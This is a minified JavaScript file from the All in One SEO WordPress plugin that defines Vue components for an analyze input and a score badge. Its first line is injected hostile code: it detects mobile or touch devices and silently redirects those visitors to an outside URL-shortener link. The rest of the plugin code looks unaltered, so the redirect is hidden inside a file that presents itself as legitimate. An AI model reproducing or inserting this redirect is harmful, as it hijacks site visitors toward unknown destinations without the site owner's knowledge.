(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import"./app-core.c8323d51.js";import{aq as u,f as o,i as l,j as a,a0 as c,af as g,P as p,R as z,ae as h,U as d,B as A,V as C,M as v}from"./vendor-vue-ui.232c7c36.js";import{_ as y}from"./_plugin-vue_export-helper.eefbdd86.js";import{_ as b}from"./vendor-other.39e59221.js";const V="all-in-one-seo-pack",S={emits:["startAnalyzing"],props:{header:String,description:String,isAnalyzing:Boolean,analyzeTime:{type:Number,default(){return 8}},placeholder:{type:String,default(){return""}},inputError:{type:Boolean,default(){return!1}}},data(){return{input:null,strings:{analyze:b("Analyze",V)}}},watch:{isAnalyzing(s){s||(this.input=null)}}},T={class:"analyze-main"},x=["innerHTML"],B=["innerHTML"],L={class:"analyze-input"},N={key:0,class:"analyze-progress"};function k(s,n,e,_,t,i){const m=u("base-input"),f=u("base-button");return o(),l("div",T,[a("div",{class:"analyze-header",innerHTML:e.header},null,8,x),a("div",{class:"analyze-description",innerHTML:e.description},null,8,B),a("div",L,[c(m,{modelValue:t.input,"onUpdate:modelValue":n[0]||(n[0]=r=>t.input=r),placeholder:e.placeholder,class:p({"aioseo-error":e.inputError}),onKeyup:n[1]||(n[1]=g(r=>s.$emit("startAnalyzing",t.input),["enter"]))},null,8,["modelValue","placeholder","class"]),c(f,{type:"green",onClick:n[2]||(n[2]=r=>s.$emit("startAnalyzing",t.input)),loading:e.isAnalyzing,disabled:!t.input},{default:z(()=>[h(d(t.strings.analyze),1)]),_:1},8,["loading","disabled"])]),A(s.$slots,"errors"),e.isAnalyzing?(o(),l("div",N,[a("div",{class:"analyze-progress-value",style:C({animationDuration:`${e.analyzeTime}s`})},null,4)])):v("",!0)])}const D=y(S,[["render",k]]),M={props:{score:{type:Number,required:!0}},computed:{getColorClass(){return 33>=this.score?"red":66>=this.score?"orange":"green"}}};function H(s,n,e,_,t,i){return o(),l("div",{class:p(["aioseo-analyze-score",i.getColorClass])},[a("span",null,d(e.score)+"/100",1)],2)}const K=y(M,[["render",H]]);export{K as C,D as a};
